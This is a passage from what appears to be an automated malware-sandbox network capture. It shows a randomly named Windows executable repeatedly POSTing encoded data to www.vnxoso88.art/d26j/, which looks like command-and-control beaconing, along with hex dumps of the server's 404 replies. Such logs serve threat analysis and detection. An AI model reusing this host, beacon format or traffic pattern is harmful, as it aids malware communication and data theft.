                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XX3Wuet/YHW07LZrI2ABfV22QUkhVCHs0ezi8QDEmbpfeTSpa5Suh1bzJOp4a15opnxMHLb71LZ8a+rP+BAYXQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                        Nov 7, 2024 17:58:22.913758993 CET987INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiM2VkY2UwYWMtNWQyNy00YzQxLTllMjktNjQ1Yjc2Mzg3NDUwIiwicGFnZV90aW1lIjoxNzMwOTk4Nz


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        9192.168.2.74985066.29.146.14803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 17:58:28.029933929 CET643OUTPOST /d26j/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 215
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.vnxoso88.art
                                                                        Origin: http://www.vnxoso88.art
                                                                        Referer: http://www.vnxoso88.art/d26j/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 2f 52 31 7a 73 2f 69 4b 6d 66 66 2b 47 53 2b 78 4f 46 4f 56 32 44 64 46 58 6c 41 39 30 6a 73 69 55 54 4e 56 55 6a 62 57 77 36 6c 33 42 66 55 50 4d 75 54 56 66 62 6d 77 48 58 59 2f 32 62 71 45 5a 68 59 56 4b 2f 4e 47 6f 51 34 68 4a 6b 64 79 39 64 74 6b 32 57 31 32 4d 78 5a 32 49 33 39 4f 2f 37 45 70 4e 6a 68 63 57 68 52 55 59 70 68 6d 58 5a 52 33 45 68 64 73 45 6e 72 6d 63 6e 55 55 61 38 6b 6a 67 76 71 50 73 52 74 4f 62 52 61 53 39 72 42 48 36 55 37 77 6c 68 45 54 74 57 71 4c 32 75 46 6f 52 55 79 52 55 71 30 4b 65 37 45 52 48 5a 59 58 77 6a 4f 52 74 42 39 35 79 44 58 44 69 73 71 5a 35 6d 6b 33 6c 58 38 61 69 6b 50 4b 30 77 3d 3d
                                                                        Data Ascii: 7j=/R1zs/iKmff+GS+xOFOV2DdFXlA90jsiUTNVUjbWw6l3BfUPMuTVfbmwHXY/2bqEZhYVK/NGoQ4hJkdy9dtk2W12MxZ2I39O/7EpNjhcWhRUYphmXZR3EhdsEnrmcnUUa8kjgvqPsRtObRaS9rBH6U7wlhETtWqL2uFoRUyRUq0Ke7ERHZYXwjORtB95yDXDisqZ5mk3lX8aikPK0w==
                                                                        Nov 7, 2024 17:58:28.689205885 CET1236INHTTP/1.1 404 Not Found
                                                                        keep-alive: timeout=5, max=100
                                                                        content-type: text/html
                                                                        transfer-encoding: chunked
                                                                        content-encoding: gzip
                                                                        vary: Accept-Encoding
                                                                        date: Thu, 07 Nov 2024 16:58:28 GMT
                                                                        server: LiteSpeed
                                                                        x-turbo-charged-by: LiteSpeed
                                                                        connection: close
                                                                        Data Raw: 31 33 34 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                                        Data Ascii: 134CZJvLg!qCV's=pB<w?Kfm( o=|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s*^o/^VL?{fUm7n*/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,D*yl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=n*Ko:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug|J
                                                                        Nov 7, 2024 17:58:28.689233065 CET1236INData Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7
                                                                        Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9
                                                                        Nov 7, 2024 17:58:28.689248085 CET424INData Raw: e1 b2 c4 27 0b 58 34 da 70 d9 69 82 ef 72 73 3b b1 24 71 62 db 82 c6 38 9d ee 1a 66 3a cd d5 99 44 eb ac 38 ed 5a d4 0e 66 21 4d 65 49 74 c6 3b 02 8f a1 b4 de f2 c9 36 88 d4 12 31 47 c6 d8 10 36 ee 78 8c 25 68 b5 8f 75 9a 0b e6 e2 24 1a a5 f5 82
                                                                        Data Ascii: 'X4pirs;$qb8f:D8Zf!MeIt;61G6x%hu$#|NpTqf76[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-
                                                                        Nov 7, 2024 17:58:28.689490080 CET1236INData Raw: a9 9f 63 66 29 9d c2 c9 1e 5a ec 40 b6 59 0d c3 63 21 12 6a 5a cb b1 47 66 1b ce 9a 93 d4 70 38 52 d5 39 b2 90 8b f5 01 ab c2 ad 67 4f d3 00 09 14 31 37 b8 0d 7f 48 68 ca c5 ac c9 50 c7 5b a9 0b b3 90 2b b4 04 4b eb c0 21 55 8d a1 48 b1 5d 6b d4
                                                                        Data Ascii: cf)Z@Yc!jZGfp8R9gO17HhP[+K!UH]k]*F9I?!S*@kpF38'!6I;ywV4-*"g)W3*i$v#TsT2r,.,$ .P,-i@DU\-
                                                                        Nov 7, 2024 17:58:28.689694881 CET1100INData Raw: 75 57 24 b9 1b ef 46 c1 4e 63 59 ed ec b4 c2 1e 1e b2 58 70 38 80 a2 1f 2e 59 c3 13 2a 8b f2 11 b2 dc 3d 48 98 0e 49 8c 86 e3 56 31 3c 99 cc f7 b4 8d f8 d0 6c 1e ce 8d 50 2e 26 05 d1 a0 fb a2 71 ac ca 3c e7 e8 68 bd 62 96 de 3e cf a5 90 67 47 e1
                                                                        Data Ascii: uW$FNcYXp8.Y*=HIV1<lP.&q<hb>gGX`c4d>f}8Dt"j2<s84bm; ^W^F@0pC*0I+s:F7H|He+sZD'0,p$dEzBtb($Uk65


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        10192.168.2.74985166.29.146.14803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 17:58:30.580878973 CET663OUTPOST /d26j/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 235
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.vnxoso88.art
                                                                        Origin: http://www.vnxoso88.art
                                                                        Referer: http://www.vnxoso88.art/d26j/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 2f 52 31 7a 73 2f 69 4b 6d 66 66 2b 48 78 32 78 49 6b 4f 56 6a 54 64 43 53 6c 41 39 2b 44 73 6d 55 54 52 56 55 69 76 47 78 4a 52 33 42 36 77 50 4e 76 54 56 65 62 6d 77 4d 33 5a 31 79 62 71 4e 5a 68 55 6e 4b 39 5a 47 6f 51 73 68 4a 6d 31 79 39 75 56 6e 30 47 31 77 5a 42 5a 30 56 6e 39 4f 2f 37 45 70 4e 6a 45 35 57 68 5a 55 62 5a 78 6d 52 49 52 32 59 52 64 76 54 58 72 6d 59 6e 55 51 61 38 6b 56 67 75 32 70 73 53 5a 4f 62 56 65 53 39 2b 31 41 30 55 37 32 34 78 46 79 6f 7a 54 63 33 73 39 6a 49 48 79 34 53 39 6f 56 66 4e 46 7a 64 37 55 37 75 79 32 71 70 44 5a 50 6c 6c 4b 32 67 74 75 42 30 45 51 57 36 67 5a 77 76 32 75 4f 69 4d 43 45 58 6b 48 45 36 34 64 6f 6b 2f 42 51 69 43 4f 68 35 32 73 3d
                                                                        Data Ascii: 7j=/R1zs/iKmff+Hx2xIkOVjTdCSlA9+DsmUTRVUivGxJR3B6wPNvTVebmwM3Z1ybqNZhUnK9ZGoQshJm1y9uVn0G1wZBZ0Vn9O/7EpNjE5WhZUbZxmRIR2YRdvTXrmYnUQa8kVgu2psSZObVeS9+1A0U724xFyozTc3s9jIHy4S9oVfNFzd7U7uy2qpDZPllK2gtuB0EQW6gZwv2uOiMCEXkHE64dok/BQiCOh52s=
                                                                        Nov 7, 2024 17:58:31.242033005 CET1236INHTTP/1.1 404 Not Found
                                                                        keep-alive: timeout=5, max=100
                                                                        content-type: text/html
                                                                        transfer-encoding: chunked
                                                                        content-encoding: gzip
                                                                        vary: Accept-Encoding
                                                                        date: Thu, 07 Nov 2024 16:58:31 GMT
                                                                        server: LiteSpeed
                                                                        x-turbo-charged-by: LiteSpeed
                                                                        connection: close
                                                                        Data Raw: 31 33 35 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                                        Data Ascii: 1356ZJvLg!qCV's=pB<w?Kfm( o=|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s*^o/^VL?{fUm7n*/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,D*yl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=n*Ko:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug|J
                                                                        Nov 7, 2024 17:58:31.242069960 CET1236INData Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7
                                                                        Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9
                                                                        Nov 7, 2024 17:58:31.242082119 CET1236INData Raw: e1 b2 c4 27 0b 58 34 da 70 d9 69 82 ef 72 73 3b b1 24 71 62 db 82 c6 38 9d ee 1a 66 3a cd d5 99 44 eb ac 38 ed 5a d4 0e 66 21 4d 65 49 74 c6 3b 02 8f a1 b4 de f2 c9 36 88 d4 12 31 47 c6 d8 10 36 ee 78 8c 25 68 b5 8f 75 9a 0b e6 e2 24 1a a5 f5 82
                                                                        Data Ascii: 'X4pirs;$qb8f:D8Zf!MeIt;61G6x%hu$#|NpTqf76[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-
                                                                        Nov 7, 2024 17:58:31.242093086 CET1236INData Raw: 6d 08 e0 d4 0a dd b4 e7 e3 32 ae d7 4d c0 d2 1b 1a 33 09 f1 d4 c1 84 de 2d 8a 8e f4 b3 93 bd 45 74 ce 5f 12 27 6c 81 0b 90 1e 0f 77 22 4c 34 99 3d 2a f6 11 85 d3 79 83 a7 07 6f 05 a7 81 36 26 51 10 9a e5 51 45 2c dd 6d a7 76 75 94 fa f5 0c 5d 91
                                                                        Data Ascii: m2M3-Et_'lw"L4=*yo6&QQE,mvu]iR*1>[$3L#$Sh=rirW:37,*27t1=fa(7k^'rAsoFT2;i|2r.eHQb;q-neJ'q
                                                                        Nov 7, 2024 17:58:31.242105961 CET283INData Raw: de 2e 98 ef 06 f0 4f c8 5f 09 75 7d a5 fc 89 2c d7 ec df 02 f5 33 34 fd e9 05 4e 7f fe 54 09 17 39 df 9b f0 7a a3 e7 e1 3f 52 14 d0 e2 3b d9 9f 35 74 f7 ed 11 fe 6c d5 23 fc 91 55 6e 70 f4 01 5f 57 81 e0 95 c5 c7 e7 02 de 7b 3d ff 32 a8 5e 5d bb
                                                                        Data Ascii: .O_u},34NT9z?R;5tl#Unp_W{=2^].l;JX8KOw>=wIn |O7/I-T?b.@g|"7{=T|&{6yc


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        11192.168.2.74985266.29.146.14803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 17:58:33.127088070 CET1676OUTPOST /d26j/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 1247
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.vnxoso88.art
                                                                        Origin: http://www.vnxoso88.art
                                                                        Referer: http://www.vnxoso88.art/d26j/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 2f 52 31 7a 73 2f 69 4b 6d 66 66 2b 48 78 32 78 49 6b 4f 56 6a 54 64 43 53 6c 41 39 2b 44 73 6d 55 54 52 56 55 69 76 47 78 4a 4a 33 42 49 34 50 4d 4d 37 56 45 62 6d 77 46 58 5a 30 79 62 72 66 5a 68 64 75 4b 39 56 57 6f 56 6f 68 49 48 56 79 31 2f 56 6e 2b 47 31 77 62 42 5a 35 49 33 38 4d 2f 37 55 31 4e 6a 55 35 57 68 5a 55 62 62 35 6d 48 70 52 32 4c 42 64 73 45 6e 72 71 63 6e 55 38 61 38 38 46 67 75 79 6d 73 42 42 4f 62 31 4f 53 2f 4d 74 41 38 55 37 30 37 78 46 51 6f 7a 57 62 33 73 67 61 49 45 75 57 53 36 45 56 66 72 55 46 45 34 6b 74 30 67 75 4b 69 46 4e 75 6b 56 48 48 67 4f 57 74 38 6d 45 4a 35 52 5a 4d 72 48 36 77 67 5a 37 61 49 47 7a 48 6a 38 39 75 76 66 30 35 36 42 53 35 34 77 72 69 65 69 53 56 48 7a 72 44 2b 7a 6d 45 66 37 61 43 6f 6e 57 46 30 49 6b 54 67 59 41 75 4d 45 52 35 30 68 65 53 54 55 44 4d 47 68 75 56 79 33 4e 77 4c 6a 30 36 78 2b 67 4b 67 41 54 71 56 32 76 79 71 69 6b 44 55 7a 68 65 58 39 50 57 75 5a 44 74 74 71 49 5a 48 38 67 56 7a 45 51 57 33 67 49 4f 6a 70 47 35 42 53 6d [TRUNCATED]
                                                                        Data Ascii: 7j=/R1zs/iKmff+Hx2xIkOVjTdCSlA9+DsmUTRVUivGxJJ3BI4PMM7VEbmwFXZ0ybrfZhduK9VWoVohIHVy1/Vn+G1wbBZ5I38M/7U1NjU5WhZUbb5mHpR2LBdsEnrqcnU8a88FguymsBBOb1OS/MtA8U707xFQozWb3sgaIEuWS6EVfrUFE4kt0guKiFNukVHHgOWt8mEJ5RZMrH6wgZ7aIGzHj89uvf056BS54wrieiSVHzrD+zmEf7aConWF0IkTgYAuMER50heSTUDMGhuVy3NwLj06x+gKgATqV2vyqikDUzheX9PWuZDttqIZH8gVzEQW3gIOjpG5BSm+T/2up97WJtIRBMN4gWnu93PsaeOCjmBBPF1OZFqRSF881VxCH9RwOXJotPk0i4xu33NvG5VUAnh8Uw1L+q7HAxIo+EGuN8e3KalOqMR5LmUoBePgvboYvk9U2zbLS6ZN8l4Qf3j0wmncgyJX/PFtdCRYK6COjDs+n1F4Msk0iTZ9jQj+9rjKWFvlRdiHze1EWh4vZpEXM5u85Fg2sVS7DvvdcAE/koLOvdp2NAA+uYMKOE23eHGBAToS4wwnzb9dDcFIPmSbKVx7uc6yYSNw8tC0l9n/eWheJ1DkexrMPdvsm6tcELUt8hLXr0r+ecfPxRLxrsOrmA3HvOd8yYupMLC1QKf5IeFf5227H5RSWiin6UNDZKfv0h/8a05BQ8klbo2fAgY5IJENtdsg5wTJOTyaRZgmUaqt3P1mjsCVFpjZDYQj+qLe6XcRO9UrMLVMAjcV6ZXvrlCOZ/vpkNV43g4DnGTWZbvbhpY9kKmORQiJ8fZTC2RCk69WLDWBzwdf2V3Tc5bBUxXFwFE3ybTmw01gmBKV2Jb7cMMuAMOg5KJWTTI5PtPrzSMOnzz+Od0oj5WLo6tfYo9G8xTNS2FJiLnvWAiAOLNnJrHJk4gHCB48DVvsP8I+dBhcgSWo19vQOvtNP76l6yzweVjptiU3W/+Z5q6GV3Acb [TRUNCATED]
                                                                        Nov 7, 2024 17:58:33.803602934 CET1236INHTTP/1.1 404 Not Found
                                                                        keep-alive: timeout=5, max=100
                                                                        content-type: text/html
                                                                        transfer-encoding: chunked
                                                                        content-encoding: gzip
                                                                        vary: Accept-Encoding
                                                                        date: Thu, 07 Nov 2024 16:58:33 GMT
                                                                        server: LiteSpeed
                                                                        x-turbo-charged-by: LiteSpeed
                                                                        connection: close
                                                                        Data Raw: 31 33 34 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                                        Data Ascii: 134CZJvLg!qCV's=pB<w?Kfm( o=|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s*^o/^VL?{fUm7n*/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,D*yl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=n*Ko:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug|J
                                                                        Nov 7, 2024 17:58:33.803643942 CET212INData Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7
                                                                        Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0
                                                                        Nov 7, 2024 17:58:33.803653955 CET1236INData Raw: fb 19 6f ce 65 5a 65 16 d7 d5 07 ce f5 72 18 bf 8a 1f fd ca be bd 1e 6f 3e 18 7a 15 09 b9 39 a7 f7 cb 6e 94 f3 72 e0 7e b6 fe 07 00 ba c9 d7 9f 19 fe 8d ea 07 c1 67 32 01 aa fd 5f 04 9f 1f c3 46 5d c4 7f 72 cc ca 7c b8 84 11 38 4f fd bf 58 66 e9
                                                                        Data Ascii: oeZero>z9nr~g2_F]r|8OXf/^j-2M^G_T(-m8?nCKjy{Z@/*P:}[dlR($};Lk! }q%fN~6_eAjxYPwgRgqSj|Ij
                                                                        Nov 7, 2024 17:58:33.803664923 CET1236INData Raw: 39 b4 bc 94 a9 89 bc dc 1a 5c 5b 1f 87 04 15 28 6e 87 cb a6 a8 2e 5a 41 14 d5 58 8d 14 ab 2d b5 69 ee 24 8e 05 07 2c b9 5e b1 4c bb a6 6b 72 8b 23 e5 4a 0c 57 63 80 98 76 3f 66 7c ca 65 0f b1 29 4d a2 8a 62 11 48 ea 5a 70 39 4d ee ca b5 29 65 9a
                                                                        Data Ascii: 9\[(n.ZAX-i$,^Lkr#JWcv?f|e)MbHZp9M)e1>qZB0t-Zm>Tj3V=3+L`&&WS"8ea#{Y:v\Hi\Kv^$r Rp;~cf)Z@Yc!jZGfp
                                                                        Nov 7, 2024 17:58:33.803678036 CET1236INData Raw: 04 bd 2e c7 65 b2 09 48 51 d8 f0 62 3b ab 16 a7 71 2d 8f 14 17 6e a9 b4 a0 bb 65 4a 99 27 71 b5 d8 46 2a d9 66 f4 fc a4 41 90 a3 af cb 9a 9b 43 0b 32 c7 68 96 f0 78 a7 f4 8e 41 c7 ab 6b 75 1f d7 82 be d8 15 5a 09 0e 57 34 87 2c fd b3 18 17 a6 46
                                                                        Data Ascii: .eHQb;q-neJ'qF*fAC2hxAkuZW4,F6Q;:fWSRWd@vHNgfD1zO[h6x<&8PDaz$d[DWu$P[;.n)Nkt56!]i,NKJ)"jMVx;uW$FNcYXp8.Y*
                                                                        Nov 7, 2024 17:58:33.803688049 CET76INData Raw: 7c af b3 97 22 e2 dd 37 e6 7b 3d f1 bf ff 0b 54 7c d0 d1 e0 9a da 07 26 7b 36 9b 79 63 90 f7 f8 7a 84 af ad f6 08 3f e7 ab c7 cb b3 b8 6f bf fd 0f 00 00 00 ff ff 0d 0a 41 0d 0a 03 00 ea 36 39 22 74 27 00 00 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: |"7{=T|&{6ycz?oA69"t'0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        12192.168.2.74985366.29.146.14803872C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 17:58:35.675074100 CET389OUTGET /d26j/?7j=yTdTvK6nwd7fLzOfAFK44iBGWUg6tisBFi4nbiSuwNVJLrY4NtXgfJKYD2NhiKrdBAMHfcdZvgkmH1tO/OhN2l5ObUVyEmhL88sORBUDBhEqT85THbs6ZR8PHSXuaXUURr4h8daA5RZo&UvgPX=o0HdzhbpI6gx HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Connection: close
                                                                        Host: www.vnxoso88.art
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Nov 7, 2024 17:58:36.369124889 CET1236INHTTP/1.1 404 Not Found
                                                                        keep-alive: timeout=5, max=100
                                                                        content-type: text/html
                                                                        transfer-encoding: chunked
                                                                        date: Thu, 07 Nov 2024 16:58:36 GMT
                                                                        server: LiteSpeed
                                                                        x-turbo-charged-by: LiteSpeed
                                                                        connection: close
